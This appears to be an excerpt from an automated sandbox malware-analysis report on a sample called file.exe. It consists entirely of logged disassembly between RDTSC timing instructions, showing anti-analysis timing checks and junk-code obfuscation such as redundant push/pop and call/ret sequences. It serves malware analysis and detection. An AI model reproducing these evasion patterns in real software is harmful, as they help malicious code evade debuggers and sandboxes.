              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABDA7 second address: CABDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABDAD second address: CABDB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABDB1 second address: CABDC1 instructions: 0x00000000 rdtsc 0x00000002 je 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CABFFF second address: CAC01C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push edi 0x00000008 pop edi 0x00000009 jmp 00007F055D0637C2h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC01C second address: CAC024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC024 second address: CAC02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC02A second address: CAC030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC030 second address: CAC036 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC036 second address: CAC040 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 pushad 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC040 second address: CAC04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push esi 0x00000006 jo 00007F055D0637B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7310E second address: C73112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C73112 second address: C7311D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC1B7 second address: CAC1BD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC858 second address: CAC85E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC85E second address: CAC867 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC867 second address: CAC871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F055D0637B6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CAC871 second address: CAC87B instructions: 0x00000000 rdtsc 0x00000002 je 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAC9F1 second address: CAC9FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CACB40 second address: CACB56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b popad 0x0000000c pop eax 0x0000000d rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CACB56 second address: CACB73 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 pop eax 0x00000005 jmp 00007F055D0637C1h 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ecx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CACEB2 second address: CACEC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F055C7C832Eh 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CACEC1 second address: CACED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 jl 00007F055D0637B6h 0x0000000b pop edi 0x0000000c popad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CACED3 second address: CACEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F055C7C8326h 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CACEDD second address: CACEE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAF4CA second address: CAF4D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAF4D0 second address: CAF4D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CAF4D4 second address: CAF50D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push esi 0x0000000a jmp 00007F055C7C8339h 0x0000000f pop esi 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 jmp 00007F055C7C832Bh 0x00000019 mov eax, dword ptr [eax] 0x0000001b push edx 0x0000001c push ebx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74B85 second address: C74B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C74B8B second address: C74B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push edi 0x00000007 pop edi 0x00000008 pop ecx 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB398 second address: CBB3C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637BEh 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F055D0637C9h 0x0000000e rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAC6C second address: CBAC7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F055C7C832Ch 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAC7D second address: CBACA1 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F055D0637C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jo 00007F055D0637B6h 0x00000014 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBACA1 second address: CBACBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F055C7C8326h 0x00000013 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBACBB second address: CBACBF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBACBF second address: CBACCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F055C7C8326h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBAF72 second address: CBAF7C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F055D0637BCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB0DF second address: CBB0E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB0E5 second address: CBB0E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBB0E9 second address: CBB0FE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8331h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBCCD7 second address: CBCCE9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBCCE9 second address: CBCCED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CBCCED second address: CBCCF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC022C second address: CC0232 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0232 second address: CC0238 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0D04 second address: CC0D0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0D0A second address: CC0D0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC0D0E second address: CC0D12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1704 second address: CC170A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC1FAD second address: CC1FB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC383E second address: CC384F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055D0637BDh 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC384F second address: CC3853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8DBF second address: CC8DC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CC8DC4 second address: CC8DE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055C7C8339h 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCA03D second address: CCA041 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCA041 second address: CCA04B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F055C7C832Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCBCA7 second address: CCBD28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edi 0x00000006 push eax 0x00000007 jmp 00007F055D0637C9h 0x0000000c nop 0x0000000d jmp 00007F055D0637C8h 0x00000012 push 00000000h 0x00000014 mov di, E444h 0x00000018 jmp 00007F055D0637BAh 0x0000001d push 00000000h 0x0000001f push 00000000h 0x00000021 push edi 0x00000022 call 00007F055D0637B8h 0x00000027 pop edi 0x00000028 mov dword ptr [esp+04h], edi 0x0000002c add dword ptr [esp+04h], 00000015h 0x00000034 inc edi 0x00000035 push edi 0x00000036 ret 0x00000037 pop edi 0x00000038 ret 0x00000039 add ebx, dword ptr [ebp+122D2CE9h] 0x0000003f xchg eax, esi 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F055D0637C0h 0x00000047 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCCF3B second address: CCCF3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCCF3F second address: CCCF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCCF45 second address: CCCFDF instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F055C7C8328h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F055C7C832Ah 0x00000010 nop 0x00000011 movzx edi, cx 0x00000014 push dword ptr fs:[00000000h] 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F055C7C8328h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov dword ptr [ebp+122D1C4Eh], edi 0x0000003b mov dword ptr [ebp+122D2D9Eh], esi 0x00000041 mov dword ptr fs:[00000000h], esp 0x00000048 mov ebx, 0CE471DFh 0x0000004d mov eax, dword ptr [ebp+122D119Dh] 0x00000053 push 00000000h 0x00000055 push edx 0x00000056 call 00007F055C7C8328h 0x0000005b pop edx 0x0000005c mov dword ptr [esp+04h], edx 0x00000060 add dword ptr [esp+04h], 0000001Dh 0x00000068 inc edx 0x00000069 push edx 0x0000006a ret 0x0000006b pop edx 0x0000006c ret 0x0000006d add edi, dword ptr [ebp+122D1A67h] 0x00000073 push FFFFFFFFh 0x00000075 mov dword ptr [ebp+122D2DE1h], edx 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e jp 00007F055C7C8328h 0x00000084 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCCFDF second address: CCCFFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055D0637C8h 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCEEAA second address: CCEEAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCEEAE second address: CCEEB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCEEB4 second address: CCEF2D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jmp 00007F055C7C832Dh 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F055C7C8328h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 mov dword ptr [ebp+122D1C1Bh], eax 0x0000002e movsx edi, cx 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007F055C7C8328h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000019h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d mov ebx, edx 0x0000004f push 00000000h 0x00000051 jmp 00007F055C7C832Dh 0x00000056 push eax 0x00000057 pushad 0x00000058 pushad 0x00000059 push ecx 0x0000005a pop ecx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCEF2D second address: CCEF36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCEF36 second address: CCEF3A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCF058 second address: CCF067 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD102B second address: CD1030 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CCF067 second address: CCF0D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a jc 00007F055D0637B6h 0x00000010 push dword ptr fs:[00000000h] 0x00000017 pushad 0x00000018 or dword ptr [ebp+124557EDh], edx 0x0000001e mov edx, dword ptr [ebp+122D27CAh] 0x00000024 popad 0x00000025 mov dword ptr fs:[00000000h], esp 0x0000002c jmp 00007F055D0637C6h 0x00000031 mov eax, dword ptr [ebp+122D0EBDh] 0x00000037 add edi, dword ptr [ebp+122D29B9h] 0x0000003d push FFFFFFFFh 0x0000003f movzx edi, ax 0x00000042 add edi, dword ptr [ebp+122D1AA5h] 0x00000048 push eax 0x00000049 push ecx 0x0000004a pushad 0x0000004b pushad 0x0000004c popad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD21F3 second address: CD21F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD21F7 second address: CD2213 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD2213 second address: CD22AF instructions: 0x00000000 rdtsc 0x00000002 jl 00007F055C7C8328h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ecx 0x00000010 call 00007F055C7C8328h 0x00000015 pop ecx 0x00000016 mov dword ptr [esp+04h], ecx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc ecx 0x00000023 push ecx 0x00000024 ret 0x00000025 pop ecx 0x00000026 ret 0x00000027 movzx edi, cx 0x0000002a add dword ptr [ebp+122D2CEFh], ebx 0x00000030 push 00000000h 0x00000032 and di, 0120h 0x00000037 push 00000000h 0x00000039 push 00000000h 0x0000003b push edi 0x0000003c call 00007F055C7C8328h 0x00000041 pop edi 0x00000042 mov dword ptr [esp+04h], edi 0x00000046 add dword ptr [esp+04h], 00000017h 0x0000004e inc edi 0x0000004f push edi 0x00000050 ret 0x00000051 pop edi 0x00000052 ret 0x00000053 mov bl, 22h 0x00000055 mov dword ptr [ebp+122D2576h], ecx 0x0000005b xchg eax, esi 0x0000005c jmp 00007F055C7C8337h 0x00000061 push eax 0x00000062 push eax 0x00000063 push edx 0x00000064 push eax 0x00000065 jmp 00007F055C7C8336h 0x0000006a pop eax 0x0000006b rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD3413 second address: CD341D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD0215 second address: CD022B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C8332h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD1219 second address: CD1220 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD250E second address: CD2519 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD5419 second address: CD541F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD541F second address: CD5425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD5425 second address: CD5429 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD2519 second address: CD251D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD251D second address: CD253B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055D0637C2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD253B second address: CD2541 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD4558 second address: CD4562 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F055D0637B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6278 second address: CD6282 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F055C7C8326h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6282 second address: CD6287 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD6287 second address: CD62B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F055C7C832Dh 0x0000000f jmp 00007F055C7C8331h 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 jl 00007F055C7C8326h 0x0000001d rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CD7476 second address: CD7491 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F055D0637C7h 0x00000009 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDC1ED second address: CDC203 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F055C7C832Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE057C second address: CE058A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 je 00007F055D0637C2h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CE058A second address: CE0590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDFC3D second address: CDFC4B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push esi 0x00000006 jne 00007F055D0637B6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
               Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: CDFD81 second address: CDFD85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
